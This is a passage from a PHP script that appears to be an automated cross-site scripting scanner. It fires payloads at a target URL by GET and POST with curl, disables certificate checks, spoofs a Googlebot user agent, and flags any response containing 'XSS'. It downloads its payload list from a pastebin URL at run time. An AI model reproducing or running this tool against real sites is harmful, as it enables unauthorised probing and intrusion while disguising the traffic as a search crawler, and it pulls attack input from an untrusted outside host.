[!] Method POST Url >> $x?".urlencode($payload).""; // echo"\r\n[!] Method GET Url >> $x?".urlencode($payload).""; flush();@ob_flush(); return true; }else{ $ch=curl_init(); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,$x); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,"".urlencode($payload)); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); curl_setopt($ch,CURLOPT_TIMEOUT,30); $data=curl_exec($ch); if(preg_match('/XSS/',$data)){ echo"\r\n[!] Method POST Url >> $x?".urlencode($payload).""; flush();@ob_flush(); return true; }else{ echo"\r\n[!] NOT FOUND !!! "; flush();@ob_flush(); return false; } } } $homepage = file_get_contents('http://pastebin.com/raw.php?i=mJcw4XsU'); $payloader = explode("\n",$homepage); foreach($payloader as $payload) { $payload = @trim($payload); scan($x,$payload); } }//end of post key ?>